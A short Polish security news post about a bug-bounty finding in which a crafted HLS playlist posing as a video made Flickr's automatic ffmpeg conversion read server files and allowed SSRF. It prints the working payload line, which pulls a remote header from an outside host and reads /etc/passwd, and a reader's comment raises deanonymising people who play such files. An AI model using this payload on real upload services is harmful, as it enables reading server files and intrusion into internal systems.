-15% na nową książkę sekuraka: Wprowadzenie do bezpieczeństwa IT. Przy zamówieniu podaj kod: 10000

Jak (nie)zwykłym filmem można było czytać pliki z serwera Flickera

30 stycznia 2020, 19:22 | W biegu | 1 komentarz

Opis wartego $2000 znaleziska można znaleźć tutaj.

Przykładowy plik video wygląda np. tak:

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://dx.su/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST

a cała magia dzieje się w trakcie konwersji, np.: ffmpeg -i podatny_plik.mp4 -o wynik.avi, która jest wykonywana automatycznie po uploadzie pliku od użytkownika.

„Dziwna” zawartość pliku graficznego to użycie pewnej ciekawej funkcji od Apple (HTTP Live Streaming). Co więcej podatność poza czytaniem plików z serwera może również być użyta do SSRF (Server Side Request Forgery) – można zmusić serwer do komunikacji z samym sobą (na różne porty), czy nawet do serwerów backendowych (normalnie nieosiągalnych). Nota bene: cała podatność SSRF (w tym trick z ffmpeg) jest kompleksowo opisana w naszej książce o bezpieczeństwie aplikacji.

Sam PoC filmu dostępny jest w oryginalnym wpisie na HackerOne.

–ms

 

 

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. pytanko

    Czy odtwarzacz typu vlc też pozwoli tak stworzonemu plikowi dzwonić do domu? Brzmi jak sposób na deanonimizację np odtwarzających film pobrany z tora, ale to by było za piękne.

    Odpowiedz

Odpowiedz